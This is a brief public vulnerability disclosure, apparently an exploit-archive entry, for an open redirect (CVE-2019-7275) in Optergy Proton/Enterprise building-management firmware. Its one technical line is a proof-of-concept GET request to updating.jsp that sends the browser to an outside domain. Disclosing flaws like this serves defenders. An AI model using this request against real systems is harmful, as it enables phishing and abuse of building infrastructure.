Share
Open Redirect in Optergy Proton/Enterprise BMS  
Firmware version: <=2.3.0a  
CVE: CVE-2019-7275  
Advisory: https://applied-risk.com/resources/ar-2019-008  
Paper: https://applied-risk.com/resources/i-own-your-building-management-system  
  
by Gjoko 'LiquidWorm' Krstic  
  
GET /updating.jsp?url=https://segfault.mk HTTP/1.1